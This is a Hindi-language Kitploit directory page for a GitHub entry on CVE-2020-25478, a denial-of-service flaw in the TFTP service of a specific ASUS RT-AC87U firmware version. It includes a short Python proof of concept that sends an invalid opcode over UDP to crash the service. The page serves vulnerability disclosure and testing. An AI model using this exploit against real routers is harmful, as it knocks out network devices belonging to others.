Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack | Kitploit
उपकरण/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
Vulnerability AnalysisExploitationFuzzingHardware & IoT Security
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
3 साल पहलेअभी तक समीक्षित नहीं

ASUS-RT-AC87U-TFTP-है-संवेदनशील-प्रति-Denial-of-Service-DoS-हमला

CVE-2020-25478 - ASUS RT-AC87U TFTP Denial of Service (DoS) हमले के प्रति संवेदनशील है

  1. प्रभावित उत्पाद(ों) और संस्करण(ों) के नाम

ASUS RT-AC87U 3.0.0.4.382_51640

  1. समस्या प्रकार

यह मुख्य रूप से CWE-20 से संबंधित है, ASUS RT-AC87U पर चलने वाली TFTP सेवा Denial of Service (DoS) हमले के प्रति संवेदनशील है जब सेवा को अमान्य opcode भेजा जाता है। निम्नलिखित पायथन कोड स्निपेट का उपयोग कमजोरी के परीक्षण के लिए किया जाता है:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. विवरण

Asus RT-AC87U संस्करण 3.0.0.4.382_51640 TFTP सेवा पर denial of service हमले के प्रति संवेदनशील है जिससे TFTP सेवा क्रैश हो जाती है। TFTP सेवा अमान्य opcode भेजकर दूरस्थ रूप से क्रैश होने की संभावना रखती है।

https://www.asus.com/content/ASUS-Product-Security-Advisory/

टूल डाउनलोड करें